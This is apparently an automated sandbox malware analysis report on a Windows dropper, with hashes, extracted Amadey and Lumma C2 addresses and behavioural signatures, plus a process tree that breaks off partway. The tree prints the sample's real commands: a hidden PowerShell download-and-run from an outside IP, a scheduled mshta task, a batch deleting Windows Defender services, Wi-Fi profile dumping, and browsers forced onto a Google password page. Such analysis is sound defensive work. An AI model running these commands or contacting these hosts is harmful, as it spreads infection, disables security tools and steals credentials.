Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/04/2025, 14:49

General

  • Target

    2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    ce2b9785c340ab0ff7d0a35e99f27317

  • SHA1

    b6b9a11d00b8ed50db4a0f6be6fa8c59e704ca0b

  • SHA256

    6de611581e7afbb1bb6fbdea27022d3265144ee3312d47f8d95aa4d6f0e10d26

  • SHA512

    38f7fd0bc19858ecf977dd6ecb61d2ae6b63dd0d88714c957a4a7790c9be118d993b3f022cc0305a5d1a97b5a46bde47a0bbc46ec48fea5b063add97ac4be2f2

  • SSDEEP

    24576:uqDEvCTbMWu7rQYlBQcBiT6rprG8a0ou:uTvC/MTQYxsWR7a0o

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://advennture.top/GKsiio

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://iqironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://madvennture.top/GKsiio

https://targett.top/dsANGt

https://qspacedbv.world/EKdlsk

https://igalxnetb.today/GsuIAo

https://hcosmosyf.top/GOsznj

https://hywnnavstarx.shop/FoaJSi

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 16 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 22 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 55 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 32 IoCs
  • Suspicious use of SendNotifyMessage 26 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-02_ce2b9785c340ab0ff7d0a35e99f27317_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3244
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 0xGD9mal5qN /tr "mshta C:\Users\Admin\AppData\Local\Temp\yL7W3nM1t.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2636
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn 0xGD9mal5qN /tr "mshta C:\Users\Admin\AppData\Local\Temp\yL7W3nM1t.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1796
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\yL7W3nM1t.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2460
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4624
        • C:\Users\Admin\AppData\Local\TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE
          "C:\Users\Admin\AppData\Local\TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1376
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3068
            • C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe
              "C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4352
              • C:\Users\Admin\AppData\Local\Temp\261.exe
                "C:\Users\Admin\AppData\Local\Temp\261.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2636
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8194.tmp\8195.tmp\8196.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:452
                  • C:\Users\Admin\AppData\Local\Temp\261.exe
                    "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                    9⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:4936
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\825F.tmp\8260.tmp\8261.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                      10⤵
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:1000
                      • C:\Windows\system32\sc.exe
                        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                        11⤵
                        • Launches sc.exe
                        PID:4188
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:1332
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        11⤵
                        • Delays execution with timeout.exe
                        PID:2476
                      • C:\Windows\system32\sc.exe
                        sc stop ddrver
                        11⤵
                        • Launches sc.exe
                        PID:1304
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:1348
                      • C:\Windows\system32\takeown.exe
                        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:3816
                      • C:\Windows\system32\icacls.exe
                        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:2960
                      • C:\Windows\system32\sc.exe
                        sc stop "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:1004
                      • C:\Windows\system32\sc.exe
                        sc delete "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:3508
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                        11⤵
                          PID:4624
                        • C:\Windows\system32\sc.exe
                          sc stop "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:4128
                        • C:\Windows\system32\sc.exe
                          sc delete "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:4552
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                          11⤵
                            PID:2732
                          • C:\Windows\system32\sc.exe
                            sc stop "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:4260
                          • C:\Windows\system32\sc.exe
                            sc delete "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:3768
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                            11⤵
                              PID:4164
                            • C:\Windows\system32\sc.exe
                              sc stop "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:4772
                            • C:\Windows\system32\sc.exe
                              sc delete "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:4136
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                              11⤵
                                PID:3292
                              • C:\Windows\system32\sc.exe
                                sc stop "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:4500
                              • C:\Windows\system32\sc.exe
                                sc delete "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:4380
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                11⤵
                                • Modifies security service
                                PID:2216
                              • C:\Windows\system32\sc.exe
                                sc stop "SgrmBroker"
                                11⤵
                                • Launches sc.exe
                                PID:2344
                              • C:\Windows\system32\sc.exe
                                sc delete "SgrmBroker"
                                11⤵
                                • Launches sc.exe
                                PID:5024
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                11⤵
                                  PID:1960
                                • C:\Windows\system32\sc.exe
                                  sc stop "SecurityHealthService"
                                  11⤵
                                  • Launches sc.exe
                                  PID:2772
                                • C:\Windows\system32\sc.exe
                                  sc delete "SecurityHealthService"
                                  11⤵
                                  • Launches sc.exe
                                  PID:3512
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                  11⤵
                                    PID:3240
                                  • C:\Windows\system32\sc.exe
                                    sc stop "webthreatdefsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:1376
                                  • C:\Windows\system32\sc.exe
                                    sc delete "webthreatdefsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:3216
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                    11⤵
                                      PID:4444
                                    • C:\Windows\system32\sc.exe
                                      sc stop "webthreatdefusersvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:2456
                                    • C:\Windows\system32\sc.exe
                                      sc delete "webthreatdefusersvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:4868
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                      11⤵
                                        PID:1020
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdNisDrv"
                                        11⤵
                                        • Launches sc.exe
                                        PID:4568
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdNisDrv"
                                        11⤵
                                        • Launches sc.exe
                                        PID:1892
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                        11⤵
                                          PID:2432
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdBoot"
                                          11⤵
                                          • Launches sc.exe
                                          PID:800
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdBoot"
                                          11⤵
                                          • Launches sc.exe
                                          PID:212
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                          11⤵
                                            PID:3580
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdFilter"
                                            11⤵
                                            • Launches sc.exe
                                            PID:2196
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdFilter"
                                            11⤵
                                            • Launches sc.exe
                                            PID:1692
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                            11⤵
                                              PID:2616
                                            • C:\Windows\system32\sc.exe
                                              sc stop "SgrmAgent"
                                              11⤵
                                              • Launches sc.exe
                                              PID:4596
                                            • C:\Windows\system32\sc.exe
                                              sc delete "SgrmAgent"
                                              11⤵
                                              • Launches sc.exe
                                              PID:512
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                              11⤵
                                                PID:2448
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecWfp"
                                                11⤵
                                                • Launches sc.exe
                                                PID:4356
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecWfp"
                                                11⤵
                                                • Launches sc.exe
                                                PID:3676
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                11⤵
                                                  PID:3044
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecFlt"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:1924
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecFlt"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:1060
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                  11⤵
                                                    PID:4736
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecCore"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:4440
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecCore"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:5080
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                    11⤵
                                                      PID:1604
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                      11⤵
                                                        PID:4112
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                        11⤵
                                                          PID:3924
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                          11⤵
                                                            PID:1044
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                            11⤵
                                                              PID:744
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop ddrver
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:1772
                                                            • C:\Windows\system32\sc.exe
                                                              sc delete ddrver
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:2632
                                                  • C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:3860
                                                  • C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Accesses Microsoft Outlook profiles
                                                    • System Location Discovery: System Language Discovery
                                                    • Checks processor information in registry
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • outlook_office_path
                                                    • outlook_win_path
                                                    PID:4344
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • System Network Configuration Discovery: Wi-Fi Discovery
                                                      PID:4928
                                                      • C:\Windows\SysWOW64\chcp.com
                                                        chcp 65001
                                                        8⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1680
                                                      • C:\Windows\SysWOW64\netsh.exe
                                                        netsh wlan show profile
                                                        8⤵
                                                        • Event Triggered Execution: Netsh Helper DLL
                                                        • System Location Discovery: System Language Discovery
                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                        PID:1692
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr All
                                                        8⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2616
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 2460
                                                      7⤵
                                                      • Program crash
                                                      PID:400
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3084
                                                      • C:\Windows\SysWOW64\chcp.com
                                                        chcp 65001
                                                        8⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2020
                                                      • C:\Windows\SysWOW64\netsh.exe
                                                        netsh wlan show networks mode=bssid
                                                        8⤵
                                                        • Event Triggered Execution: Netsh Helper DLL
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1384
                                                  • C:\Users\Admin\AppData\Local\Temp\10419520101\8dcf8981c4.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10419520101\8dcf8981c4.exe"
                                                    6⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3284
                                                  • C:\Users\Admin\AppData\Local\Temp\10419530101\74899c17d4.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10419530101\74899c17d4.exe"
                                                    6⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of SetThreadContext
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2736
                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10419530101\74899c17d4.exe"
                                                      7⤵
                                                      • Downloads MZ/PE file
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1796
                                                  • C:\Users\Admin\AppData\Local\Temp\10419540101\5520df3a73.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10419540101\5520df3a73.exe"
                                                    6⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of SetThreadContext
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4900
                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10419540101\5520df3a73.exe"
                                                      7⤵
                                                      • Downloads MZ/PE file
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4776
                                                  • C:\Users\Admin\AppData\Local\Temp\10419550101\08f072925b.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10419550101\08f072925b.exe"
                                                    6⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3584
                                                  • C:\Users\Admin\AppData\Local\Temp\10419560101\f4bcfb7a05.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10419560101\f4bcfb7a05.exe"
                                                    6⤵
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Checks processor information in registry
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2684
                                                  • C:\Users\Admin\AppData\Local\Temp\10419570101\458e534b04.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10419570101\458e534b04.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:4848
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM firefox.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3956
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM chrome.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2020
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM msedge.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5084
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM opera.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2852
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM brave.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4520
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                      7⤵
                                                        PID:4900
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                          8⤵
                                                          • Checks processor information in registry
                                                          • Modifies registry class
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:1032
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {da639772-1ed0-43d9-ba1a-477ec92dfe67} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                            9⤵
                                                              PID:1344
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {414a6745-b475-4a76-8621-8e16c1d34603} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                              9⤵
                                                                PID:3404
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3868 -prefsLen 25164 -prefMapHandle 3872 -prefMapSize 270279 -jsInitHandle 3876 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3884 -initialChannelId {483e6d7f-37fe-488c-9fcb-ea68fbada469} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                9⤵
                                                                • Checks processor information in registry
                                                                PID:632
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4032 -prefsLen 27276 -prefMapHandle 4036 -prefMapSize 270279 -ipcHandle 4120 -initialChannelId {2e40df72-378d-40f7-8b6c-0bd9c6f573ef} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                9⤵
                                                                  PID:4608
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
